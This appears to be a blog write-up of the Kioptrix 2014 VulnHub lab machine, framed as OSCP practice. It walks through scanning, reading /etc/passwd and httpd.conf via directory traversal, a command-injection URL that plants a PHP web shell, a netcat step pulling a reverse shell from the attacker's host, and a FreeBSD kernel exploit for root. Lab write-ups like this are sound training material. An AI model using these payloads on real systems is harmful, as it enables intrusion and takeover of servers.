[VULNHUB] Kioptrix: 2014 (#5)

This VM it’s the first of my OSCP series. In fact these VMs are similar to the OSCP ones for difficulty. Let’s start!

DIRECTORY TRAVERSAL IS YOUR FRIEND

Always start with an nmap scan:

nmap 192.168.1.21 -sV

This is what I got:

Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-23 09:55 CET
Nmap scan report for 192.168.1.21
Host is up (0.0052s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.23 seconds

There is a closed SSH service and two HTTP web servers. I tried to do some research with nikto:

nikto -h 192.168.1.21 -p 80

The output is the same as the port 8080:

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.21
+ Target Hostname:    192.168.1.21
+ Target Port:        80
+ Start Time:         2016-11-23 09:57:14 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 18:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ 8345 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2016-11-23 09:58:58 (GMT1) (104 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Wow! Seems to be vulnerable to a buffer overflow which allow remote code execution. I tried to do some research, I found the exploit but it didn’t work because the Apache and OS version were up to date. So I browsed to http://192.168.1.21 and there was just an “It works” string. Checking the source code of the HTML page I found a comment with an URL:

URL=pChart2.1.3/index.php

There is a pChart2.1.3 directory. I opened it and the index of the platform appeared. After some reasearch I found this vulnerabilities. Directory traversal seems to be interesting. I browsed to http://192.168.1.21/pChart2.1.3/examples/index.php?Action=View&Script=/etc/passwd and the file was printed to my screen. I thought that could be the attack vector. Now I browsed to http://192.168.1.21:8080 but I got Error 403: Forbidden. I returned to the previous website and I checked the FreeBSD Apache configuration file: http://192.168.1.21/pChart2.1.3/examples/index.php?Action=View&Script=/usr/local/etc/apache22/httpd.conf. This is the relevant part:

Allow from env=Mozilla4_browser

That’s why I can’t access to the port 8080, I need a Mozilla4_browser User-Agent.

SHELL THE WEB

So I fired up Burpsuite, I activated the proxy without interception and I changed the User Agent simulating Internet Explorer. Now I can access the port 8080 and I discovered the directory listing was active with only a single directory which was phptax. Now I am into the PHPTAX index. Again I researched for vulnerabilities and I found a remote code execution. I can use the Metasploit module but let’s try an hard way. I used this one. The netcat didn’t work so I created a PHP shell with that:

http://192.168.1.21:8080/phptax/index.php?pfilez=xxx;echo %22%3C%3Fphp system(\$_GET['cmd']); %3F%3E%22 > shell.php&pdf=make

Now navigating to http://192.168.1.21:8080/phptax/shell.php?cmd=ls I can view the files. Now I used the pentestmonkey PHP reverse shell. First of all I started listening with netcat:

nc -lvp 1234 < php_reverse_shell.php

Now I executed that on the browser:

http://192.168.1.21:8080/phptax/shell.php?cmd=nc 192.168.1.12 1234 > reverse_shell.php &

I checked the download with the ls command. Then I started listening again with netcat:

nc -lvp 1234

Then I browsed to http://192.168.1.21:8080/phptax/reverse_shell.php and then I got a shell into my terminal without TTY. I tried to escape from the limited shell but there weren’t ways to achieve that. So I continued with the limited one.

YOU HAD TO UPDATE YOU FREEBSD VERSION MATE

Now I need to escalate my privileges. I checked the kernel version:

uname -a

The output is:

FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64

Ok, so I need to search for FreeBSD 9.0 privilege escalation and I found an interesting exploit. I downloaded the .c file locally and I transfered it via netcat into the /tmp folder. Then I ran it:

gcc exploit.c -o exploit
chmod +x exploit
./exploit

Now I checked that I was root with the id command and I browsed to /root directory. Now I listed the file and I opened the congrats.txt file:

If you are reading this, it means you got root (or cheated).
Congratulations either way...

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in 
mind, and not meant for the seasoned pentester. However this does not mean one 
can't enjoy them.

As with all my VMs, besides getting "root" on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and "hope" it works, but think about the traffic.. the logs... Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targetted attacks. 

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won't from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log".
It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data".
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things.
Default settings, nothing fancy but it should've logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS 
for this.
The httpd-access.log is rather self-explanatory .
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain
files. This one should've detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.

Be good...


loneferret
http://www.kioptrix.com


p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by
default it would've blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part :)
Advertisements
[VULNHUB] Kioptrix: 2014 (#5)

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s